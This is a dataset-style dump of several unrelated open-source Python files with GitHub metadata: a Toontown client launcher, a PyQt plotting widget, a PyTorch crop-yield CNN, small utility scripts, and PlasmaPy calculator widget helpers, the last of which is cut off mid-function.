blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
234fe0703bcd32e0a8e3cea1e43969c845b3ac6e | ba0cbdae81c171bd4be7b12c0594de72bd6d625a | /MyToontown/Toontown2016/toontown/toonbase/ToontownStartDist.py | 6718c47b2d8ad07f5cb8e4b83442d6bf516c3334 | [] | no_license | sweep41/Toontown-2016 | 65985f198fa32a832e762fa9c59e59606d6a40a3 | 7732fb2c27001264e6dd652c057b3dc41f9c8a7d | refs/heads/master | 2021-01-23T16:04:45.264205 | 2017-06-04T02:47:34 | 2017-06-04T02:47:34 | 93,279,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,538 | py | # This is the "main" module that will start a distribution copy of
# Toontown 2016
# Replace some modules that do exec:
import collections
collections.namedtuple = lambda *x: tuple
# This is included in the package by the prepare_client script. It contains the
# PRC file data, (stripped) DC file, and time zone info:
import game_data
# Load all of the packaged PRC config page(s):
from pandac.PandaModules import *
for i, config in enumerate(game_data.CONFIG):
name = 'GameData config page #{0}'.format(i)
loadPrcFileData(name, config)
# The VirtualFileSystem, which has already initialized, doesn't see the mount
# directives in the config(s) yet. We have to force it to load them manually:
vfs = VirtualFileSystem.getGlobalPtr()
mounts = ConfigVariableList('vfs-mount')
for mount in mounts:
mountFile, mountPoint = (mount.split(' ', 2) + [None, None, None])[:2]
mountFile = Filename(mountFile)
mountFile.makeAbsolute()
mountPoint = Filename(mountPoint)
vfs.mount(mountFile, mountPoint, 0)
# To read the DC file as a StringStream, we must override the ClientRepository:
dcStream = StringStream(game_data.DC)
from direct.distributed import ConnectionRepository
import types
class ConnectionRepository_override(ConnectionRepository.ConnectionRepository):
def readDCFile(self, dcFileNames=None):
dcFile = self.getDcFile()
dcFile.clear()
self.dclassesByName = {}
self.dclassesByNumber = {}
self.hashVal = 0
dcImports = {}
readResult = dcFile.read(dcStream, 'DC stream')
if not readResult:
self.notify.error("Could not read dc file.")
self.hashVal = dcFile.getHash()
for n in xrange(dcFile.getNumImportModules()):
moduleName = dcFile.getImportModule(n)[:]
suffix = moduleName.split('/')
moduleName = suffix[0]
suffix=suffix[1:]
if self.dcSuffix in suffix:
moduleName += self.dcSuffix
elif self.dcSuffix == 'UD' and 'AI' in suffix: #HACK:
moduleName += 'AI'
importSymbols = []
for i in xrange(dcFile.getNumImportSymbols(n)):
symbolName = dcFile.getImportSymbol(n, i)
suffix = symbolName.split('/')
symbolName = suffix[0]
suffix=suffix[1:]
if self.dcSuffix in suffix:
symbolName += self.dcSuffix
elif self.dcSuffix == 'UD' and 'AI' in suffix: #HACK:
symbolName += 'AI'
importSymbols.append(symbolName)
self.importModule(dcImports, moduleName, importSymbols)
for i in xrange(dcFile.getNumClasses()):
dclass = dcFile.getClass(i)
number = dclass.getNumber()
className = dclass.getName() + self.dcSuffix
classDef = dcImports.get(className)
if classDef is None and self.dcSuffix == 'UD':
className = dclass.getName() + 'AI'
classDef = dcImports.get(className)
if classDef == None:
className = dclass.getName()
classDef = dcImports.get(className)
if classDef is None:
self.notify.debug("No class definition for %s." % (className))
else:
if type(classDef) == types.ModuleType:
if not hasattr(classDef, className):
self.notify.warning("Module %s does not define class %s." % (className, className))
continue
classDef = getattr(classDef, className)
if type(classDef) != types.ClassType and type(classDef) != types.TypeType:
self.notify.error("Symbol %s is not a class name." % (className))
else:
dclass.setClassDef(classDef)
self.dclassesByName[className] = dclass
if number >= 0:
self.dclassesByNumber[number] = dclass
if self.hasOwnerView():
ownerDcSuffix = self.dcSuffix + 'OV'
ownerImportSymbols = {}
for n in xrange(dcFile.getNumImportModules()):
moduleName = dcFile.getImportModule(n)
suffix = moduleName.split('/')
moduleName = suffix[0]
suffix=suffix[1:]
if ownerDcSuffix in suffix:
moduleName = moduleName + ownerDcSuffix
importSymbols = []
for i in xrange(dcFile.getNumImportSymbols(n)):
symbolName = dcFile.getImportSymbol(n, i)
suffix = symbolName.split('/')
symbolName = suffix[0]
suffix=suffix[1:]
if ownerDcSuffix in suffix:
symbolName += ownerDcSuffix
importSymbols.append(symbolName)
ownerImportSymbols[symbolName] = None
self.importModule(dcImports, moduleName, importSymbols)
for i in xrange(dcFile.getNumClasses()):
dclass = dcFile.getClass(i)
if ((dclass.getName()+ownerDcSuffix) in ownerImportSymbols):
number = dclass.getNumber()
className = dclass.getName() + ownerDcSuffix
classDef = dcImports.get(className)
if classDef is None:
self.notify.error("No class definition for %s." % className)
else:
if type(classDef) == types.ModuleType:
if not hasattr(classDef, className):
self.notify.error("Module %s does not define class %s." % (className, className))
classDef = getattr(classDef, className)
dclass.setOwnerClassDef(classDef)
self.dclassesByName[className] = dclass
ConnectionRepository.ConnectionRepository = ConnectionRepository_override
# We also need timezone stuff:
class dictloader(object):
def __init__(self, dict):
self.dict = dict
def get_data(self, key):
return self.dict.get(key.replace('\\','/'))
import pytz
pytz.__loader__ = dictloader(game_data.ZONEINFO)
# Finally, start the game:
import toontown.toonbase.ToontownStart
| [
"sweep14@gmail.com"
] | sweep14@gmail.com |
42c8a383b2d310a0e02a6e8acb97b3e392f78b79 | 2e72c5ab40eed0dd41ffb2c6cc902c019434cd55 | /MainPage/findClosestBranch.py | 8f31ae807402216c2ba1e687f7644f72902e2c54 | [] | no_license | MateuszsuetaM/ussr | 445c777df0656178d153ab0f5b43d4b052cb48ce | 9e62714ef8f3d79f97bc07bc376d97cb6372de52 | refs/heads/master | 2021-09-03T11:27:23.959714 | 2018-01-08T18:11:22 | 2018-01-08T18:11:22 | 111,199,941 | 0 | 0 | null | 2017-11-25T13:22:07 | 2017-11-18T11:25:52 | Python | UTF-8 | Python | false | false | 622 | py | from math import cos, asin, sqrt
from company import models
def distance(lat1, lon1, lat2, lon2):
p = 0.017453292519943295
a = 0.5 - cos((lat2-lat1)*p)/2 + cos(lat1*p)*cos(lat2*p) * (1-cos((lon2-lon1)*p)) / 2
return 12742 * asin(sqrt(a))
def getClosest(u_lat, u_lon):
closestBranch = ''
closestDistance = -1
for branch in CompanyBranch.objects:
tmpDistance = distance(branch.latitude, branch.longitude, u_lat, u_lon)
if closestDistance == -1 or closestDistance > tmpDistance:
closestDistance = tmpDistance
closestBranch = branch
return closestBranch
| [
"ksazon@sigma.ug.edu.pl"
] | ksazon@sigma.ug.edu.pl |
976ee0ae69a2b1866f4ac2bf56a9bc4c1732988a | d8e4c9182c83ef781e2b574cd639917ecd38a53a | /ralgraph/chart.py | 07c1f0a5891c0850ea04238b64b8002c3a7563bf | [] | no_license | mirmik/ralgraph | b98fa39904b1e5cea4cfde9f4e6a81a3b7728999 | a66da89ab85b86b7d68787b8b199267f12c40da7 | refs/heads/master | 2020-07-03T12:20:35.018998 | 2020-04-06T10:00:35 | 2020-04-06T10:00:35 | 201,902,647 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,309 | py | #!/usr/bin/python3
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
import numpy
import time
import threading
class ArrayChart:
def __init__(self, plot=None):
self.plot = plot
self.x_chart_coords = []
self.y_chart_coords = []
self.autoscale = True
self.xmin = float("inf")
self.ymin = float("inf")
self.xmax = -float("inf")
self.ymax = -float("inf")
if plot is not None:
self.plot.attach_chart(self)
def redraw(self):
self.plot.redraw()
def set_vertices(self, vtxs):
self.vertices = vtxs
def set_color(self, r, g, b, a=1):
self.qcolor = QColor.fromRgbF(r,g,b,a)
def set_xrange(self, xmin, xmax):
self.xmin = xmin
self.xmax = xmax
self.autoscale = False
def set_yrange(self, ymin, ymax):
self.ymin = ymin
self.ymax = ymax
self.autoscale = False
def set_xcoords(self, xarr):
if self.autoscale:
for x in xarr:
if x > self.xmax: self.xmax = x
if x < self.xmin: self.xmin = x
xr = 2 / (self.xmax - self.xmin)
self.x_chart_coords = [ ((x - self.xmin) * xr) - 1 for x in xarr ]
def set_ycoords(self, yarr):
if self.autoscale:
for y in yarr:
if y > self.ymax: self.ymax = y
if y < self.ymin: self.ymin = y
yr = 2 / (self.ymax - self.ymin)
self.y_chart_coords = [ ((y - self.ymin) * yr) - 1 for y in yarr ]
def set_coords(self, x, y):
self.set_xcoords(x)
self.set_ycoords(y)
def draw(self, painter, center, whalf, hhalf):
painter.setPen(self.qcolor)
points = [0] * len(self.x_chart_coords)
for i in range(len(self.x_chart_coords)):
x = self.x_chart_coords[i]
y = self.y_chart_coords[i]
points[i] = center + QPointF(x*whalf, y*hhalf)
for i in range(len(points) - 1):
painter.drawLine(points[i], points[i+1])
class PlotWidget(QWidget):
def __init__(self):
QWidget.__init__(self)
#self.vertices = []
self.charts = []
self.margins = [80,20,20,50]
self.border=True
self.set_border_color(0.5,0.5,0.5)
self.set_background(0,0,0)
def set_background(self, r, g, b):
pal = self.palette();
pal.setColor(QPalette.Background, QColor.fromRgbF(r,g,b))
self.setAutoFillBackground(True)
self.setPalette(pal)
def set_border_color(self, r, g, b):
self._border_color = QColor.fromRgbF(r,g,b)
def attach_chart(self, chart):
self.charts.append(chart)
chart.plot = self
def redraw(self):
self.update()
def set_left_margin(self, arg):
self.margins[0] = arg
self.redraw()
def set_bottom_margin(self, arg):
self.margins[3] = arg
self.redraw()
def set_top_margin(self, arg):
self.margins[2] = arg
self.redraw()
def set_right_margin(self, arg):
self.margins[1] = arg
self.redraw()
def set_margins(self, mrgs):
self.margins = mrgs
self.redraw()
def paintEvent(self, ev):
w = self.width() - self.margins[0] - self.margins[1]
h = self.height() - self.margins[2] - self.margins[3]
w_half = w/2
h_half = h/2
c = QPointF(w_half + self.margins[0], h_half+self.margins[2])
painter = QPainter(self)
for chart in self.charts:
chart.draw(painter, c, w_half, h_half)
if self.border:
painter.setPen(self._border_color)
if self.border:
painter.drawLine(QPoint(self.margins[0], self.margins[2]), QPoint(self.margins[0], self.height()-self.margins[3]))
painter.drawLine(QPoint(self.margins[0], self.height()-self.margins[3]), QPoint(self.width()-self.margins[1], self.height()-self.margins[3]))
painter.end()
if __name__ == "__main__":
import sys
app = QApplication(sys.argv[1:])
plot = PlotWidget()
chart = ArrayChart(plot)
chart2 = ArrayChart(plot)
t = numpy.linspace(-100, 100, 1000)
y = numpy.sin(t*0.2) * 100
y2 = numpy.cos(t*0.2) * 100
chart.set_color(1,0,0)
chart2.set_color(0,1,0)
chart.set_coords(t, y)
chart2.set_coords(t, y2)
chart.redraw()
chart2.redraw()
class Thr(QThread):
def run(self):
stime = time.time()
while 1:
ctime = time.time() - stime
t = numpy.linspace(-100+ctime*5, 100+ctime*5, 1000)
y = numpy.sin(t*0.2) * 100
y2 = numpy.cos(t*0.2) * 100
chart.set_xrange(-100+ctime*5, 100+ctime*5)
chart2.set_xrange(-100+ctime*5, 100+ctime*5)
chart.set_coords(t, y)
chart2.set_coords(t, y2)
chart.redraw()
chart2.redraw()
time.sleep(0.01)
thr = Thr()
thr.start()
plot.show()
app.exec() | [
"netricks@protonmail.com"
] | netricks@protonmail.com |
910aba7d092e6fe88237d6d7c73f25a5638d20a8 | c70dfc0d74b34e41f7d2dbdbd6bfaca2f79af55b | /cyp/models/convnet.py | 7e74e171c0c26477317c14467986b5411a787c77 | [
"MIT"
] | permissive | jeangolay/pycrop-yield-prediction | a2c65fa3bd704d1d3251318a9afe39bfcd05cf10 | 1b36b673cc58b506ad4d3c8bd6b6917ac5a72d28 | refs/heads/master | 2021-02-18T06:58:31.844163 | 2019-11-25T13:45:55 | 2019-11-25T13:45:55 | 245,172,915 | 0 | 1 | MIT | 2020-03-05T13:39:21 | 2020-03-05T13:39:20 | null | UTF-8 | Python | false | false | 7,994 | py | import torch
from torch import nn
import torch.nn.functional as F
from pathlib import Path
from .base import ModelBase
class ConvModel(ModelBase):
"""
A PyTorch replica of the CNN structured model from the original paper. Note that
this class assumes feature_engineering was run with channels_first=True
Parameters
----------
in_channels: int, default=9
Number of channels in the input data. Default taken from the number of bands in the
MOD09A1 + the number of bands in the MYD11A2 datasets
dropout: float, default=0.5
Default taken from the original paper
dense_features: list, or None, default=None.
output feature size of the Linear layers. If None, default values will be taken from the paper.
The length of the list defines how many linear layers are used.
time: int, default=32
The number of timesteps being used. This is necessary to pass in the initializer since it will
affect the size of the first dense layer, which is the flattened output of the conv layers
savedir: pathlib Path, default=Path('data/models')
The directory into which the models should be saved.
device: torch.device
Device to run model on. By default, checks for a GPU. If none exists, uses
the CPU
"""
def __init__(self, in_channels=9, dropout=0.5, dense_features=None, time=32,
savedir=Path('data/models'), use_gp=True, sigma=1, r_loc=0.5, r_year=1.5,
sigma_e=0.01, sigma_b=0.01,
device=torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')):
# save values for reinitialization
self.in_channels = in_channels
self.dropout = dropout
self.dense_features = dense_features
self.time = time
model = ConvNet(in_channels=in_channels, dropout=dropout,
dense_features=dense_features, time=time)
if dense_features is None:
num_dense_layers = 2
else:
num_dense_layers = len(dense_features)
model_weight = f'dense_layers.{num_dense_layers - 1}.weight'
model_bias = f'dense_layers.{num_dense_layers - 1}.bias'
super().__init__(model, model_weight, model_bias, 'cnn', savedir, use_gp, sigma, r_loc,
r_year, sigma_e, sigma_b, device)
def reinitialize_model(self, time=None):
# the only thing which changes here is the time value, since this affects the
# size of the first dense layer.
if time is None:
time = self.time
model = ConvNet(in_channels=self.in_channels, dropout=self.dropout,
dense_features=self.dense_features, time=time)
if self.device.type != 'cpu':
model = model.cuda()
self.model = model
class ConvNet(nn.Module):
"""
A crop yield conv net.
For a description of the parameters, see the ConvModel class.
Only handles strides of 1 and 2
"""
def __init__(self, in_channels=9, dropout=0.5, dense_features=None, time=32):
super().__init__()
# values taken from the paper
in_out_channels_list = [in_channels, 128, 256, 256, 512, 512, 512]
stride_list = [None, 1, 2, 1, 2, 1, 2]
# Figure out the size of the final flattened conv layer, which
# is dependent on the input size
num_divisors = sum([1 if i == 2 else 0 for i in stride_list])
for i in range(num_divisors):
if time % 2 != 0:
time += 1
time /= 2
if dense_features is None:
dense_features = [2048, 1]
dense_features.insert(0, int(in_out_channels_list[-1] * time * 4))
assert len(stride_list) == len(in_out_channels_list), \
"Stride list and out channels list must be the same length!"
self.convblocks = nn.ModuleList([
ConvBlock(in_channels=in_out_channels_list[i-1],
out_channels=in_out_channels_list[i],
kernel_size=3, stride=stride_list[i],
dropout=dropout) for
i in range(1, len(stride_list))
])
self.dense_layers = nn.ModuleList([
nn.Linear(in_features=dense_features[i-1],
out_features=dense_features[i]) for
i in range(1, len(dense_features))
])
self.initialize_weights()
def initialize_weights(self):
for convblock in self.convblocks:
nn.init.kaiming_uniform_(convblock.conv.weight.data)
# http://cs231n.github.io/neural-networks-2/#init
# see: Initializing the biases
nn.init.constant_(convblock.conv.bias.data, 0)
for dense_layer in self.dense_layers:
nn.init.kaiming_uniform_(dense_layer.weight.data)
nn.init.constant_(dense_layer.bias.data, 0)
def forward(self, x, return_last_dense=False):
"""
If return_last_dense is true, the feature vector generated by the second to last
dense layer will also be returned. This is then used to train a Gaussian Process model.
"""
for block in self.convblocks:
x = block(x)
# flatten
x = x.view(x.shape[0], -1)
for layer_number, dense_layer in enumerate(self.dense_layers):
x = dense_layer(x)
if return_last_dense and (layer_number == len(self.dense_layers) - 2):
output = x
if return_last_dense:
return x, output
return x
class ConvBlock(nn.Module):
"""
A 2D convolution, followed by batchnorm, a ReLU activation, and dropout
"""
def __init__(self, in_channels, out_channels, kernel_size, stride, dropout):
super().__init__()
self.conv = Conv2dSamePadding(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride)
self.batchnorm = nn.BatchNorm2d(num_features=out_channels)
self.relu = nn.ReLU()
self.dropout = nn.Dropout(dropout)
def forward(self, x):
x = self.relu(self.batchnorm(self.conv(x)))
return self.dropout(x)
class Conv2dSamePadding(nn.Conv2d):
"""Represents the "Same" padding functionality from Tensorflow.
See: https://github.com/pytorch/pytorch/issues/3867
This solution is mostly copied from
https://github.com/pytorch/pytorch/issues/3867#issuecomment-349279036
Note that the padding argument in the initializer doesn't do anything now
"""
def forward(self, input):
return conv2d_same_padding(input, self.weight, self.bias, self.stride,
self.dilation, self.groups)
def conv2d_same_padding(input, weight, bias=None, stride=1, dilation=1, groups=1):
# stride and dilation are expected to be tuples.
# first, we'll figure out how much padding is necessary for the rows
input_rows = input.size(2)
filter_rows = weight.size(2)
effective_filter_size_rows = (filter_rows - 1) * dilation[0] + 1
out_rows = (input_rows + stride[0] - 1) // stride[0]
padding_rows = max(0, (out_rows - 1) * stride[0] + effective_filter_size_rows - input_rows)
rows_odd = (padding_rows % 2 != 0)
# same for columns
input_cols = input.size(3)
filter_cols = weight.size(3)
effective_filter_size_cols = (filter_cols - 1) * dilation[1] + 1
out_cols = (input_cols + stride[1] - 1) // stride[1]
padding_cols = max(0, (out_cols - 1) * stride[1] + effective_filter_size_cols - input_cols)
cols_odd = (padding_cols % 2 != 0)
if rows_odd or cols_odd:
input = F.pad(input, [0, int(cols_odd), 0, int(rows_odd)])
return F.conv2d(input, weight, bias, stride,
padding=(padding_rows // 2, padding_cols // 2),
dilation=dilation, groups=groups)
| [
"gabriel.tseng@mail.mcgill.ca"
] | gabriel.tseng@mail.mcgill.ca |
2e230cb8aa62731299b1f164e9a99323b26e1092 | 727d8e53595146fcb20a1fc9ede035027caa78e0 | /fixAddPlants.py | 811caca48f68155a4a71f49c7484616654f2a039 | [] | no_license | yzyly1992/PWP-Lib-Crawler | b5de68c26e72ccf46bb89bfc5c68d0158d0e044e | 7c14d1444a230c2cd4b33160afa2a57299735b7b | refs/heads/master | 2021-05-23T15:16:16.497585 | 2020-10-09T00:50:55 | 2020-10-09T00:50:55 | 253,356,336 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | import os, re
import json
with open("plants.json", "r") as jsonFile:
data = json.load(jsonFile)
i = len(data)
n = 0
while n < i:
path = data[n]["path"]
data[n]["mac"] = path.replace("\\", "/").replace("Y:", "/Volumes/Library")
n += 1
with open("plants.json", "w") as f:
json.dump(data, f)
| [
"zyang03@risd.edu"
] | zyang03@risd.edu |
85fe15a332034b335a9570daf22b21f4db86e628 | 6c7208a85a33accbae4408946a458558766787fd | /writeAbsence.py | 26afee715eb56695b0e69e45fc9603bd29ac7090 | [] | no_license | 17Pixelz/Face_Reco | f3f409537bb8c196d299cb2104e0ac8d27799feb | 40d477a847226619fa8f09ecf5dd4bd2c808d13c | refs/heads/main | 2023-05-31T11:54:47.436625 | 2021-06-24T16:35:16 | 2021-06-24T16:35:16 | 376,830,855 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | import csv
def giveAbsenceFile(names):
with open('absence.csv', mode='w') as absence:
writer = csv.writer(absence, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
for name in set(names):
writer.writerow([name, 'P']) | [
"touamayoussef@gmail.com"
] | touamayoussef@gmail.com |
132e4ee4c793bdc4161705a02085ff9af6bd4275 | cdf4c78d609fc6cf39deaa74dae56d2ba33f027f | /basic_syntax/1_6input.py | 5d81bcc6d037727e7b73cf9ba605a95a81b678af | [] | no_license | choyeaeun/Python_study | 0b201b91e28b63a382bee1fc3c74ee3c2056844a | d0dab7aabb4579fa24dd64b42ca94d2be854264a | refs/heads/master | 2020-08-07T16:37:14.534707 | 2019-10-11T15:51:03 | 2019-10-11T15:51:03 | 213,526,906 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | #사용자의 입력을 받는 함수 input
print('what is your name?')
a = input()
print('my name is ', a)
#input함수에서는 간단한 print기능이 포함되어 있음
mine = input('가위 바위 보 중에 하나를 내 보세요')
print('mine:', mine) | [
"silbia629@gmail.com"
] | silbia629@gmail.com |
3df046ae73258735aa27ee3942b82aec114a9ca8 | e72b8ac4d15e37fca4a34c775de490371bf3a2e1 | /plasmapy/utils/calculator/widget_helpers.py | 1a10b2c87b53d06d6d14eea15d3f0d9c28b93ecb | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | RAJAGOPALAN-GANGADHARAN/PlasmaPy | a4cd91cfcc31cfe6b69b6174d37bb094ddbf0052 | 3c1d6a72af2531a4603f227eabe74971a98da662 | refs/heads/main | 2023-01-08T05:12:02.952882 | 2022-03-19T18:00:35 | 2022-03-19T18:00:35 | 159,909,658 | 1 | 0 | NOASSERTION | 2018-12-01T04:42:14 | 2018-12-01T04:42:12 | null | UTF-8 | Python | false | false | 18,149 | py | """
Contains functions that create widgets and process properties for the calculator.
"""
__all__ = []
import abc
import importlib
import ipywidgets as widgets
from inspect import signature
from plasmapy.particles import Particle
BLACK = (0, 0, 0)
"""RGB constant for black."""
DARK_RED = (255, 0, 0)
"""RGB Constant for dark red."""
LIGHT_GREEN = (0, 128, 0)
"""RGB Constant for light green."""
ERROR_STYLE = "2px solid red"
"""Constant for error style."""
EQUAL_SPACING_CONFIG = "10px 10px 10px 10px"
"""Constant for equal spacing config among widgets."""
values_container = {}
"""stores the values of widget with corresponding ``property_name``."""
_process_queue = []
"""
Stores the functions to be processed. This data is gathered from
``properties_metadata.json``.
"""
class _GenericWidget(abc.ABC):
"""
Generic widget class
Parameters
----------
property_name: `str`
Name of the property the widget is associated with.
This value is key for the values_container.
property_alias: `str`
Alias of the property. Useful to display in validation error messages.
values_cont: `dict`
Reference to global dictionary to store the values of the widgets.
Raises
------
`NotImplementedError`
If the method `create_widget` is not implemented.
"""
def __init__(self, property_name, property_alias="", values_cont=values_container):
self.property_name = property_name
self.property_alias = property_alias or property_name
self.widget = None
self.values_cont = values_cont
self.unit = None
self.units_dropdown = None
def set_unit(self, unit):
"""
Set unit for the value of widget, defaults to `None`.
Parameters
----------
unit: `astropy.units.Unit`
Unit to be set for the value of widget
"""
self.unit = unit
def get_widget(self):
"""
Get current widget object reference
Returns
-------
`ipywidgets.Widget`
Current widget object reference
"""
return self.widget
def get_dropdown_widget(self):
"""
Get dropdown widget associated with current widget, defaults to `None`.
Returns
-------
`ipywidgets.Dropdown`
Dropdown widget associated with current widget
"""
return self.units_dropdown
def set_place_holder(self, text):
"""
Set place holder text of the widget, defaults to empty string
Parameters
----------
text: `str`
Place holder text to be set
"""
self.widget.placeholder = text
@abc.abstractmethod
def create_widget(self):
"""
Virtual method to create widget
"""
pass
def post_creation(self):
"""
Default method that is called after widget creation.
Attaches change listener to the widget.
"""
self.set_place_holder("")
self.widget.observe(self.handle_change, names="value")
def edge_case(self, value):
"""
Edge case handling for the widget. This is called within handle_change.
Parameters
----------
value: `any`
Value of the widget
"""
pass
def edge_case_condition(self, value):
"""
Edge case condition for the widget.
Parameters
----------
value: `any`
Value of the widget
Returns
-------
`bool`
`True` if the value is an edge case, `False` otherwise
"""
return False
def try_change_value(self, value):
"""
Set property_name in values_container to value.
Parameters
----------
value: `any`
Value to be set
"""
self.values_cont[self.property_name] = value
def display_error(self, value):
"""
Handle invalid input provide realtime validation.
Parameters
----------
value: `any`
Value of the widget
"""
if self.widget:
self.widget.layout.border = ERROR_STYLE
self.widget.description = f"Invalid {self.property_alias}"
self.values_cont[self.property_name] = None
def convert_to_unit(self, change):
"""
Convert the value of the widget to the unit specified by the dropdown.
Parameters
----------
change: `any`
New value of the widget
Returns
-------
`any`
Value of the widget in the unit specified by the dropdown
"""
return change.new * self.unit if self.unit else change.new
def attach_units_dropdown(self, options):
"""
Special method that attaches dropdown widget to the input widget,
and handles the change event of the dropdown widget.
Parameters
----------
options: `list`
List of units to be displayed in the dropdown widget
"""
self.units_dropdown = widgets.Dropdown(
options=options, value=options[0], layout=widgets.Layout(width="100px")
)
self.units_dropdown.observe(self.handle_dropdown_change, names="value")
def handle_dropdown_change(self, change):
"""
Handle change event of the dropdown widget.
Parameters
----------
change: `any`
New value of the dropdown widget
"""
self.set_unit(self.units_dropdown.value)
if self.property_name in self.values_cont:
self.values_cont[self.property_name] = (
self.values_cont[self.property_name].value * self.unit
)
def handle_change(self, change):
"""
Handle change event of the widget, follows same process
for all widgets.
Gets the new value with units, checks for invalid input,
edge case and updates values_container accordingly.
Parameters
----------
change: `any`
New value of the widget
"""
value = self.convert_to_unit(change)
if self.edge_case_condition(value):
self.edge_case(value)
else:
try:
self.try_change_value(value)
except Exception:
self.display_error(value)
class _FloatBox(_GenericWidget):
"""
Derived from _GenericWidget, a FloatBox input widget
with incremental options.
Parameters
----------
property_name: `str`
Name of the property the widget is associated with.
min: `float`
Minimum value the widget can take
max: `float`
Maximum value the widget can take
"""
def __init__(self, property_name, min=-1e50, max=1e50):
super().__init__(property_name)
self.min = min
self.max = max
def create_widget(self, style={"description_width": "initial"}):
"""
Implements create_widget. description_width is set to initial
to make the widget as wide as possible.
"""
self.widget = widgets.BoundedFloatText(
name=self.property_name,
min=self.min,
max=self.max,
value=0,
step=0.1,
style=style,
)
self.post_creation()
class _CheckBox(_GenericWidget):
"""
Derived from _GenericWidget, a CheckBox input widget.
Parameters
----------
property_name: `str`
Name of the property the widget is associated with.
"""
def __init__(self, property_name):
super().__init__(property_name)
def create_widget(self):
"""
Implements create_widget.
"""
self.widget = widgets.Checkbox(value=False)
self.post_creation()
class _ParticleBox(_GenericWidget):
"""
Derived from _GenericWidget, input widget specific for particle
name.
Parameters
----------
property_name: `str`
Name of the property the widget is associated with.
property_alias: `str`
Alias of the property the widget is associated with.
(particle_type in this case)
"""
def __init__(self, property_name, property_alias=None):
super().__init__(property_name, property_alias=property_alias)
def edge_case_condition(self, value):
"""
Edge case for particle box, checks if value is empty.
Parameters
----------
value: `str`
Value of the widget
Returns
-------
`bool`
`True` if the value is empty, `False` otherwise
"""
return value is None or value == ""
def edge_case(self, value):
"""
Edge case to handle empty value of particle box
resets the container value to `None`, and resets the error status.
"""
self.values_cont[self.property_name] = None
self.widget.description = ""
self.widget.layout.border = ""
def try_change_value(self, value):
"""
Set property_name in values_container to value,
and resets the error status.
Parameters
----------
value: `str`
Value to be set
Raises
------
`~plasmapy.particles.exceptions.InvalidParticleError`
Raised when the particle input does not correspond to a valid
particle or is contradictory.
"""
particle = Particle(value)
self.values_cont[self.property_name] = particle
self.widget.layout.border = ""
self.widget.description = ""
def create_widget(self, style={"description_width": "initial"}):
"""
Implements create_widget. description_width is set to initial
to make the widget as wide as possible.
"""
self.widget = widgets.Text(style=style)
self.post_creation()
class _IonBox(_ParticleBox):
"""
Derived from _ParticleBox, input widget specific for ion.
Parameters
----------
property_name: `str`
Name of the property the widget is associated with.
property_alias: `str`
Alias of the property the widget is associated with.
"""
def __init__(self, property_name, property_alias=None):
super().__init__(property_name, property_alias=property_alias)
def try_change_value(self, value):
"""
Set property_name in values_container to value on validating input.
Parameters
----------
value: `str`
Value to be set
Raises
------
`~plasmapy.particles.exceptions.InvalidParticleError`
Raised when the particle input does not correspond to a valid
particle or is contradictory.
`ValueError`
Raised when the input is not a valid ion
"""
ion = Particle(value)
if not ion.is_ion:
raise ValueError(f"{ion} is not an ion")
self.values_cont[self.property_name] = ion
self.widget.layout.border = ""
self.widget.description = ""
class _FunctionInfo:
"""
Class to store information about a function. Gets the function's parameters,
and uses to process input based on function signature.
Parameters
----------
module_name: `str`
Name of the module the function is in
function_name: `str`
Name of the function
values_container: `dict`
Reference to global dictionary of values to be passed to the function
"""
def __init__(self, module_name, function_name, values_cont=values_container):
self.module = module_name
self.fname = function_name
self.fattr = getattr(importlib.import_module(module_name), function_name)
self.values_cont = values_cont
self.spec_combo = None
self.sig = list(signature(self.fattr).parameters.keys())
self.output_widget = widgets.Output()
self.output_widget.layout.margin = EQUAL_SPACING_CONFIG
self.output_widget.layout.padding = EQUAL_SPACING_CONFIG
def add_combo(self, spec_combo):
"""
Specify selective combination of parameters to be used in the function,
This is the case for few functions where having all parameters doesn't yield
output.
Parameters
----------
spec_combo: `list`
List of parameters to be used in the function
Example
-------
For plasmapy.formulary.gyroradius the specific combo's are as follows:
["B","particle","Vperp"] and ["B","particle","T"]
"""
if not self.spec_combo:
self.spec_combo = []
self.spec_combo.append(spec_combo)
def get_output_widget(self):
"""
Returns the output widget of the function.
Returns
-------
`~ipywidgets.widgets.Output`
Output widget of the function
"""
return self.output_widget
def produce_arg(self, spec):
"""
Prepares a dictionary of arguments that is present in both values_container,
and in spec.
Parameters
----------
spec: `list`
List of parameters to be used in the function
Returns
-------
`dict`
Dictionary of arguments that is available
"""
return {
arg: self.values_cont[arg]
for arg in spec
if arg in self.values_cont and self.values_cont[arg] is not None
}
def error_message(self, spec):
"""
Generates an error message for the function when parameters are missing.
Parameters
----------
spec: `list`
List of parameters to be used in the function
"""
print(_colored_text(BLACK, "["), end="")
for arg in spec:
if arg in self.values_cont and self.values_cont[arg] is not None:
print(_colored_text(LIGHT_GREEN, f"{arg}:present,"), end="")
else:
print(_colored_text(DARK_RED, f"{arg}:missing,"), end="")
print(_colored_text(BLACK, "]"))
def process(self):
"""
Processes the function based on signatures and spec_combo provided.
Spec_combo is prioritized over the function signature.
"""
self.output_widget.clear_output()
args_dict = {}
if self.spec_combo:
